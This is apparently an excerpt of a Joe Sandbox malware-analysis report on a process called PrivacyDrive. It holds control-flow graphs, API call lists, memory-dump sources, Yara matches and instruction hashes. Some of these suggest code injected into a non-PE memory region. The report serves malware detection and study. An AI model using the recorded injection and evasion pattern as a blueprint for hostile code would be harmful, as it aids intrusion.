                                • Instruction Fuzzy Hash: 5641D274E00209EFDB04DF98C994BAEB7B1BF88314F208698D515AB390C771AE85DB94

                                Control-flow Graph

                                control_flow_graph 1578 f8055f-f806c7 call f80b0f call f8110f call f812bf call f80eaf 1587 f80af8-f80afb 1578->1587 1588 f806cd-f806d4 1578->1588 1589 f806df-f806e3 1588->1589 1590 f80705-f80780 GetPEB 1589->1590 1591 f806e5-f80703 call f8102f 1589->1591 1593 f8078b-f8078f 1590->1593 1591->1589 1595 f80791-f807a5 1593->1595 1596 f807a7-f807b9 call f80c6f 1593->1596 1595->1593 1601 f807bb-f807e1 1596->1601 1602 f807e3-f80804 CreateThread 1596->1602 1603 f80807-f8080b 1601->1603 1602->1603 1605 f80acc-f80aef 1603->1605 1606 f80811-f80844 call f8116f 1603->1606 1605->1587 1606->1605 1610 f8084a-f80899 1606->1610 1612 f808a4-f808aa 1610->1612 1613 f808ac-f808b2 1612->1613 1614 f808f2-f808f6 1612->1614 1615 f808b4-f808c3 1613->1615 1616 f808c5-f808c9 1613->1616 1617 f808fc-f80909 1614->1617 1618 f809c4-f80ab7 call f80c6f call f80b0f call f8110f 1614->1618 1615->1616 1619 f808cb-f808d9 1616->1619 1620 f808f0 1616->1620 1621 f80914-f8091a 1617->1621 1644 f80ab9 1618->1644 1645 f80abc-f80ac6 1618->1645 1619->1620 1622 f808db-f808ed 1619->1622 1620->1612 1625 f8094a-f8094d 1621->1625 1626 f8091c-f8092a 1621->1626 1622->1620 1630 f80950-f80957 1625->1630 1628 f80948 1626->1628 1629 f8092c-f8093b 1626->1629 1628->1621 1629->1628 1632 f8093d-f80946 1629->1632 1630->1618 1634 f80959-f80962 1630->1634 1632->1625 1634->1618 1635 f80964-f80974 1634->1635 1637 f8097f-f8098b 1635->1637 1639 f809bc-f809c2 1637->1639 1640 f8098d-f809ba 1637->1640 1639->1630 1640->1637 1644->1645 1645->1605
                                APIs
                                • CreateThread.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000001,?,81EC8B55,000000FF), ref: 00F80802
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateThread
                                • String ID:
                                • API String ID: 2422867632-0
                                • Opcode ID: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
                                • Instruction ID: a57c21139efe5916b6d03124d9e302a36767b236be3bf935890f621e18efca2b
                                • Opcode Fuzzy Hash: 5bd6a16939951d1eebf937ec2fe5ed378e8e698e823b77085aa5ae91288e7f39
                                • Instruction Fuzzy Hash: B012DFB1E00219DBDB14DF98C990BEDBBB2FF88304F2482A9D515AB385C7346A45DF54
                                APIs
                                • CoCreateInstance.COMBASE(051EDCE0,00000000,00000001,051EDCD0,?), ref: 051DF04D
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CreateInstance
                                • String ID:
                                • API String ID: 542301482-0
                                • Opcode ID: efd77b52fca481ee7f69be9ed565739cd331511d377ecf876901d663429dadad
                                • Instruction ID: 9989dea6275414d5079e5a4f4fbc0e73253d7f88dfaf0ba42297db4796d4c02d
                                • Opcode Fuzzy Hash: efd77b52fca481ee7f69be9ed565739cd331511d377ecf876901d663429dadad
                                • Instruction Fuzzy Hash: D8F065B02483409FF3118F10CDA9B86BFE5EF0A700F16448DE5851F6D2C3B96885DB61
                                APIs
                                • LdrInitializeThunk.NTDLL(051E9F2B,?,00000006,?,?,00000018,?,?,?), ref: 051E675E
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                • Instruction ID: fb6f357373f259be8b0e83fffc5d2a3912a28e0da7d2036ce94b71e982b3a7e9
                                • Opcode Fuzzy Hash: b66ff63dfd389af1bc8afcc0025f999e8b2b47508af02e865142dda64173a8e3
                                • Instruction Fuzzy Hash: 76E0FE75908316AB9A09CF45C14444EFBE5BFC4714F11CC8DA4D867210D3B0AD46DF82
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: f032243683081d6106578b9e1883fb672f8f9d5322ac3019429970b3748cab80
                                • Instruction ID: cf684927cb8f22e0a9fb481820cdb780f8ab0ba0a3e3ef1978311991df551f5a
                                • Opcode Fuzzy Hash: f032243683081d6106578b9e1883fb672f8f9d5322ac3019429970b3748cab80
                                • Instruction Fuzzy Hash: E941913460C701ABE724AF14D899F2EBBE6FF85714F64881CF58697291D331E850CB56

                                Control-flow Graph

                                control_flow_graph 1320 51ad3c0-51ad3cb call 51e4c50 1323 51ad5ae-51ad5b0 ExitProcess 1320->1323 1324 51ad3d1-51ad3e0 GetInputState call 51dc320 1320->1324 1327 51ad5a9 call 51e6130 1324->1327 1328 51ad3e6-51ad41b GetCurrentThreadId GetCurrentProcessId 1324->1328 1327->1323 1329 51ad41d-51ad41f 1328->1329 1330 51ad446-51ad463 1328->1330 1332 51ad420-51ad444 call 51ad5c0 1329->1332 1333 51ad496-51ad498 1330->1333 1334 51ad465 1330->1334 1332->1330 1335 51ad49e-51ad4b4 1333->1335 1336 51ad546-51ad568 1333->1336 1338 51ad470-51ad494 call 51ad630 1334->1338 1339 51ad4e9-51ad512 1335->1339 1340 51ad4b6 1335->1340 1342 51ad56a 1336->1342 1343 51ad596-51ad59d call 51aee70 1336->1343 1338->1333 1339->1336 1347 51ad514 1339->1347 1346 51ad4c0-51ad4e7 call 51ad6b0 1340->1346 1348 51ad570-51ad594 call 51ad7b0 1342->1348 1343->1327 1354 51ad59f call 51b2610 1343->1354 1346->1339 1352 51ad520-51ad544 call 51ad720 1347->1352 1348->1343 1352->1336 1360 51ad5a4 call 51b0750 1354->1360 1360->1327
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: CurrentProcess$ExitInputStateThread
                                • String ID: clmn$ohij
                                • API String ID: 1029096631-3567580053
                                • Opcode ID: a6e2b13fedefa1d046faa577f965abc0a0eb7a379cb262bd463d76407c2030b7
                                • Instruction ID: f0c56124ecf909d7ce495db0d89239fa6b0ca6bd926f14153cf7a15e503f8b64
                                • Opcode Fuzzy Hash: a6e2b13fedefa1d046faa577f965abc0a0eb7a379cb262bd463d76407c2030b7
                                • Instruction Fuzzy Hash: 9041577950C380ABD702AF68E558A1EFFF5AF92605F148D0CE4C88B652C736D840CB63

                                Control-flow Graph

                                control_flow_graph 1466 51df073-51df0b8 1467 51df0ba 1466->1467 1468 51df0e4-51df103 SysAllocString 1466->1468 1469 51df0c0-51df0e2 call 51e2e00 1467->1469 1471 51df107-51df109 1468->1471 1469->1468
                                APIs
                                • SysAllocString.OLEAUT32(?), ref: 051DF0E5
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocString
                                • String ID: n;L9$p3w1$y/z-
                                • API String ID: 2525500382-3403012672
                                • Opcode ID: f27f4dda3722be76bea796432f66e25f1c6fa7c285570382cb6a4f21e703e267
                                • Instruction ID: df243d910ed04c145c2888e79762a87ba8597e84f265336cd2b454945df4daef
                                • Opcode Fuzzy Hash: f27f4dda3722be76bea796432f66e25f1c6fa7c285570382cb6a4f21e703e267
                                • Instruction Fuzzy Hash: 3D1169B8110B01EFD3208F25C194A26FBB2FF46701B408A0CE4A68BA51D734F952CFA0

                                Control-flow Graph

                                control_flow_graph 1549 fdd227-fdd23a 1550 fdd23c-fdd23f 1549->1550 1551 fdd252-fdd25c 1549->1551 1552 fdd241-fdd244 1550->1552 1553 fdd25e-fdd266 1551->1553 1554 fdd26b-fdd277 1551->1554 1552->1551 1555 fdd246-fdd250 1552->1555 1553->1554 1556 fdd27a-fdd27f 1554->1556 1555->1551 1555->1552 1557 fdd281-fdd28c 1556->1557 1558 fdd2b2-fdd2b9 LoadLibraryA 1556->1558 1560 fdd28e-fdd2a6 call fdd94b 1557->1560 1561 fdd2a8-fdd2ac 1557->1561 1559 fdd2bc-fdd2c0 1558->1559 1560->1561 1565 fdd2c1-fdd2c3 1560->1565 1561->1556 1562 fdd2ae-fdd2b0 1561->1562 1562->1558 1562->1559 1565->1559
                                APIs
                                • LoadLibraryA.KERNEL32(00000000,?,?), ref: 00FDD2B9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: LibraryLoad
                                • String ID: .dll
                                • API String ID: 1029625771-2738580789
                                • Opcode ID: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                • Instruction ID: ec747832b010c501221f6a94be82cc90140069d395ff660135b0e9a529661433
                                • Opcode Fuzzy Hash: 22e7a93ae9463fbf26fe8a64879a4a4537edfd71a6a3bb27af4a5e412625cd75
                                • Instruction Fuzzy Hash: 0921E472A006859FDB22CFA8C884B6D7BA5AF46331F1D416ED8469BB41D770EC45D780

                                Control-flow Graph

                                control_flow_graph 1566 51df66b-51df684 1567 51df6b4-51df734 SysAllocString 1566->1567 1568 51df686 1566->1568 1570 51df764-51df77c SysAllocString 1567->1570 1571 51df736 1567->1571 1569 51df690-51df6b2 call 51e2e60 1568->1569 1569->1567 1576 51df780 1570->1576 1573 51df740-51df762 call 51e2ef0 1571->1573 1573->1570 1576->1576
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocString
                                • String ID:
                                • API String ID: 2525500382-0
                                APIs
                                • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00FDBEBE
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151875122.0000000000F80000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_f80000_PrivacyDrive.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                APIs
                                • RtlFreeHeap.NTDLL(?,00000000), ref: 051E31D3
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FreeHeap
                                • String ID:
                                • API String ID: 3298025750-0
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 051DF637
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                APIs
                                • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 051DF637
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InformationVolume
                                • String ID:
                                • API String ID: 2039140958-0
                                APIs
                                • CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 051B2643
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: InitializeSecurity
                                • String ID:
                                • API String ID: 640775948-0
                                APIs
                                • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 051DF123
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BlanketProxy
                                • String ID:
                                • API String ID: 3890896728-0
                                APIs
                                • RtlAllocateHeap.NTDLL(?,00000000), ref: 051E3148
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                APIs
                                • CoInitialize.OLE32(00000000), ref: 051B2621
                                Memory Dump Source
                                • Source File: 00000004.00000002.2153950434.00000000051A1000.00000020.10000000.00040000.00000000.sdmp, Offset: 051A1000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_51a1000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Initialize
                                • String ID:
                                • API String ID: 2538663250-0
                                APIs
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,7563D392,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041D35D
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D36A
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF), ref: 0041D375
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D37C
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF), ref: 0041D387
                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,00000000,0053C268,000000FF,?,00410160,?), ref: 0041D38E
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0041D431
                                • CreateServiceW.ADVAPI32(00000000,PrivacyDrive,PrivacyDrive,000F01FF,00000001,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0041D461
                                • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 0041D47C
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D485
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D491
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002), ref: 0041D4F0
                                • CreateServiceW.ADVAPI32(00000000,PDSvc,PrivacyDrive Service,000F01FF,00000110,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 0041D51F
                                • ChangeServiceConfig2W.ADVAPI32(00000000,00000001,?), ref: 0041D539
                                • CloseServiceHandle.ADVAPI32(00000000), ref: 0041D540
                                • CloseServiceHandle.ADVAPI32(?), ref: 0041D54C
                                • GetLastError.KERNEL32 ref: 0041D558
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Service$CloseHandle$ManagerOpen$ChangeConfig2Create$ErrorLast
                                • String ID: !@$ V$%s%s$%spdsvc.exe$Drivers\pdv.sys$Drivers\pdv64.sys$PDSvc$Privacy Drive Encryption Engine Driver$PrivacyDrive$PrivacyDrive Service
                                • API String ID: 3379103096-671622587
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B58F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B654
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B76F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B7D5
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049B9A0
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BC51
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BD4F
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0049BD7B
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek$_malloc
                                • String ID: ADD_TO_FAVORITES_1$CHANGE_PASSWORD$CLOSE$CLOSE_ALL$DELETE_FROM_DISK$DISMOUNT$DISMOUNTALL$FAVORITES$Item$MOUNT1$MOVE_DOWN$MOVE_UP$Menu$OPEN$OPEN_FILE_LOCATION$PROPERTIES$REFRESH$REMOVE_FROM_FAVORITES
                                • API String ID: 703162041-640977299
                                APIs
                                • SHFileOperationW.SHELL32(005BDD7C,?,?,?,?,?,?,?,?,?,?,?,7563D392,?,005BDD7C), ref: 004AEE55
                                • SHFileOperationW.SHELL32(005BDD7C,?,?,?,?,?,?,?,?,?,?,?,7563D392,?,005BDD7C), ref: 004AF41A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileOperation
                                • String ID: 0025$0026$Tasks.cpp$[$[$[$[$[$[$[$[
                                • API String ID: 3080627654-3919369503
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F820
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F8D4
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045F992
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FAEA
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FB4E
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FC1E
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FC78
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FDED
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FE5C
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FEC2
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0045FF3D
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00460078
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004600CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePeek
                                • String ID: [$[
                                • API String ID: 2222842502-172125351
                                APIs
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403199
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004031D3
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 00403203
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 0040328A
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004032B8
                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000002), ref: 004033DE
                                • GetLastError.KERNEL32(?,00000001,00000001,?,?,7563D392), ref: 00403400
                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,00000001,00000000,00000000,?,00000001,00000001,?,?,7563D392), ref: 0040341F
                                • LocalFree.KERNEL32(00000000,00000001,?,?,7563D392), ref: 0040344F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Message$Peek$ErrorFormatFreeLastLocal
                                • String ID: !@$%c:$0016$0022$0029
                                • API String ID: 34859679-1726813969
                                APIs
                                • PathFileExistsW.SHLWAPI(?), ref: 0041D148
                                • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 0041D163
                                • GetLastError.KERNEL32 ref: 0041D16F
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ErrorExistsFileLastManagerOpenPath
                                • String ID: !@$%spdsvc.exe$PDSvc$PrivacyDrive Service$This service is used by Privacy Drive to perform additional operations. If this service is stopped or disabled, it will cause abn
                                • API String ID: 2356968266-3248401929
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • OpenClipboard.USER32(00000000), ref: 004243DE
                                • GetClipboardData.USER32(00000001), ref: 004243EA
                                • CloseClipboard.USER32 ref: 004243F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                 • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                 • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
